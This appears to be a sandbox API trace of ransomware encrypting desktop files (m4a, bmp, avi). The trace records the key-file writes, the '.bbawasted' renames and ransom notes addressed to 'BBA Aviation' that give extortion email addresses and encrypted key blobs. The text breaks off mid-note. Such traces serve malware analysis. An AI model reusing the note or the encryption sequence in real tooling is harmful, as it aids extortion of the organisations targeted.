[0208.442] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0208.443] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x9567 [0208.443] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9567) returned 0x640000 [0208.443] CloseHandle (hObject=0x280) returned 1 [0208.453] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0208.454] CloseHandle (hObject=0x27c) returned 1 [0208.454] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0208.454] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0208.455] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0208.455] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0208.455] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0208.456] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0208.456] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0208.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0208.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0208.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.674] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]em9LjsgI5Yvk7r/YeaNGb+HMDQHC0Fmw3ZlQZcbozTJrlmW9nw6mFTQivvlIoFhu\r\nAAyI2i6lAJCvI+zmbruJAZeudfnwlAVSbNHz/iBESBp/BL4txOgOJB28a2xtv+2/\r\nBkLRUhAQEYPAOp7E/6Jao+mZJc9ZHN55gB5R7B58PAcLW+BpYs8o7vGmkx+hLK+g\r\n0npLEit8a/R/Cx3+7NO0+PK3aizKOJtfcHsKb1rpnluDLYNf2K+vVUVF5hPhpbHH\r\nXKenRAbJL+nQxB4AUBcOqYWIbDiguxksfPUnxN/8b2d/neDaPY5Y1I0IfPTWWjLa\r\ntifAZsB3qRFctbHjjW6Klvo7zxYLk6/IaUvg5b1oUzNl5mImUisXAB0baSqbubBe\r\nDOxpIL6UOMsbmFVCkmmKN4c24rZMBQ+W1LVHIvmjTmw4sUmxOGcMinG8LlpaN8dK\r\nqwdtMUbLdZxQulUi7bDHVd+I9dedPaEG8ap95YmD6q3ACW3xYZJmNPi2lLjOoDW7\r\nTb3K6n/pLbUHZJOrIhwZrWlnLWAj5qlEHNwxE0kdAWIPAuCgG5W1fHdvuOcmdmU2\r\nuqH8uthpy50PlHpOsVo9eGdTlfUAqCXVWEsLbWI7BFHG6kV/9hVSw9H4h2oIgpnZ\r\nAmqgfTwkfKBo2qALg6z1jEZVmHRWxJIsjqhtAY03svY=[end_key]\r\nKEEP IT\r\n") returned 984 [0208.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0208.674] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0208.674] SetEndOfFile (hFile=0x294) returned 1 [0208.677] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.677] CloseHandle (hObject=0x294) returned 1 [0208.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0208.682] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2770 | out: hHeap=0x660000) returned 1 [0208.682] _aulldvrm () returned 0x0 [0208.682] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0208.683] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0208.683] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0208.683] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PUrei.m4a") returned 37 [0208.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x254) returned 0x6c4b88 [0208.683] lstrcpyW (in: lpString1=0x6c4bd2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.683] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0208.684] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.684] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0208.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PUrei.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\purei.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0208.685] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.687] SetEndOfFile (hFile=0x294) returned 1 [0208.687] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.687] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.687] lstrcpyW (in: lpString1=0x6c4bd2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PUrei.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\purei.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PUrei.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\purei.m4a.bbawasted")) returned 1 [0208.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\PUrei.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\purei.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0208.690] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0208.690] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x17871 [0208.690] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17871) returned 0x640000 [0208.691] CloseHandle (hObject=0x280) returned 1 [0208.698] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0208.699] CloseHandle (hObject=0x27c) returned 1 [0208.699] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6ae598 [0208.699] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0208.700] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x6ae5e0 | out: pbBuffer=0x6ae5e0) returned 1 [0208.700] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0208.700] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0208.701] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0208.701] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0208.981] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0208.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0208.982] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.982] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Cwhq/M0E16A8O+95AuaO0oHWbRaxzqZp69czEJ0yYQplONF2sTIihoPjkgIQMZTi\r\n3xfn3gd0bM/7QcugX2Un7Suj8XNeHPKngBF8CQBXcHeN+vjPs0rMHu6Zv3RaIoAc\r\nOUqOwadpPkC7c+DNT8ix9NNjGPXXNKMPDcnaIK8pXIX4USExbvlZcETdf+BviYkJ\r\nZgDMFq4wDc3xjeyEGUTEfKLCW1doiaGDo3BHhw3PhnwI1AhmOVLTvNAX7ly7QgG0\r\n+Bc43kHGMwHI1XwmYkiZOX/bkqkqG2c/3B3ptJDH47RgeWomyCoA5GfTjyiIcBfB\r\nNB+wX70HpOOaIYqut1GmWVL+PYERmhfIrv2hsZ6/HwB7oD+fDhmDtGL4SKLHQpfX\r\nHzmfXv/1hn2KF5tueMv16DTWxeBGCgAlPqHsveOktyYLsgnFLngp/sue/hwpPKa8\r\nShIoNfDYqVNmAVn7YUOzu0XQSNjBwcf8374O6wJs6h9mC1BDxb1nOj12oNjTPX8/\r\nliZeT9NhcuhjYwNTRvqNPTOxhBTEbONeS8o3FD9UEEJ82KeFDVvHS/K1wIBBipdX\r\nvSYj+EHpjuCeqzr/HQ1YlmRA9cR1BxKZggEPJsL2DfnWwG/sX8MzZKOv95wTejhx\r\n3Vo8/7DxPke7oijF/ZFNkIYnixfMJP9rAE1Ws9SLW1i=[end_key]\r\nKEEP IT\r\n") returned 984 [0208.982] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0208.982] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0208.982] SetEndOfFile (hFile=0x294) returned 1 [0208.985] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.985] CloseHandle (hObject=0x294) returned 1 [0208.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0208.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2c78 | out: hHeap=0x660000) returned 1 [0208.988] _aulldvrm () returned 0x0 [0208.988] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0208.989] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0208.989] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0208.989] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qccgLISoLsmxeiwo5ln.bmp") returned 51 [0208.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x270) returned 0x6c4b88 [0208.989] lstrcpyW (in: lpString1=0x6c4bee, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0208.989] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0208.989] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0208.990] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0208.990] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0208.990] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qccgLISoLsmxeiwo5ln.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\qccglisolsmxeiwo5ln.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0208.991] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0208.992] SetEndOfFile (hFile=0x294) returned 1 [0208.993] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0208.993] lstrcpyW (in: lpString1=0x6c4bee, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0208.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qccgLISoLsmxeiwo5ln.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\qccglisolsmxeiwo5ln.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qccgLISoLsmxeiwo5ln.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\qccglisolsmxeiwo5ln.bmp.bbawasted")) returned 1 [0208.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\qccgLISoLsmxeiwo5ln.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\qccglisolsmxeiwo5ln.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0208.994] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0208.994] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x81d4 [0208.994] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x81d4) returned 0x640000 [0208.995] CloseHandle (hObject=0x280) returned 1 [0208.998] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0208.999] CloseHandle (hObject=0x27c) returned 1 [0208.999] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0208.999] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0208.999] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0208.999] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0209.000] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6928) returned 1 [0209.000] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0209.000] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0209.011] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.012] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.012] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]pjIeaLc4CHfymv1MCf2bawX0mtq/oN1J6awW8rU+ZziK1FOGvuOfZ6QGYHF/NKFz\r\njJ/tXXTGsNL4fJYvx+0ga9uExdRztAE5OI+K/g9UMlVz0fKCmfCWrApxFr1Glvgh\r\nGjefS1hGuLxR/Zob4eunAl+E73gcNtD4Z2ppx7IqPZeISKJIuWMRVK9t86MRT1lm\r\nhnxnd6Ai9F3NQWOwaE7Irrf2/xz/4ef0UIaPli3DHGwJrX+AFqI/K8TEHjRPCs8m\r\ng5/ec5Vy4IXY5Es/KplQvRMPrxTBXBbK1erCFLYzutQXiJXXUe4KptO/Wp41pYhg\r\nOkoi96DexlwUH8CwtV1RyGO/s/UCLkFSCMBgWXPrtw8SqiGEmySpX4W0mV+V47po\r\nOC53YSFWHBnv+1P1UkxEv7AIJxqYlKZE78Ia7HjgDKjE1eq12cSIe61ER2HIaY3K\r\naIjSYXm9NdarS7fuksoUTOykuvL9RB9pWJhTJkqZcbHccokWdnaMHLY/UuvXnmUK\r\nKkFei52FeUyqEVOWxgfBWpHCvF7jDqGyIQO3dXViC4HtdFcIUp4L1eDnH3hqb6aQ\r\ng00xPoNb4H3RA9e/ByLyW1ubvUlNGDaxIRmOQi972yd2hsoWhfa7KXEVZF4py4uP\r\nTsn5V1Yjrye4jyhuJdPQv5Ye5KRLasDWC7A5wmm4dqy=[end_key]\r\nKEEP IT\r\n") returned 984 [0209.012] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0209.012] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0209.012] SetEndOfFile (hFile=0x294) returned 1 [0209.015] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.015] CloseHandle (hObject=0x294) returned 1 [0209.288] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0209.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b2230 | out: hHeap=0x660000) returned 1 [0209.289] _aulldvrm () returned 0x0 [0209.289] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0209.289] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0209.289] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0209.289] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\S86TMJ.avi") returned 38 [0209.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6c4b88 [0209.290] lstrcpyW (in: lpString1=0x6c4bd4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0209.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.290] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0209.290] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0209.290] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0209.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\S86TMJ.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\desktop\\s86tmj.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0209.293] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0209.294] SetEndOfFile (hFile=0x294) returned 1 [0209.295] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0209.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0209.295] lstrcpyW (in: lpString1=0x6c4bd4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0209.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\S86TMJ.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\s86tmj.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\S86TMJ.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\s86tmj.avi.bbawasted")) returned 1 [0209.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\S86TMJ.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\s86tmj.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0209.296] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0209.296] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x4253 [0209.296] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4253) returned 0x640000 [0209.297] CloseHandle (hObject=0x280) returned 1 [0209.317] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0209.317] CloseHandle (hObject=0x27c) returned 1 [0209.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0209.317] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6d68) returned 1 [0209.318] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0209.318] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0209.318] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6b48) returned 1 [0209.319] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0209.319] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0209.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0209.328] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0209.328] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0209.328] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 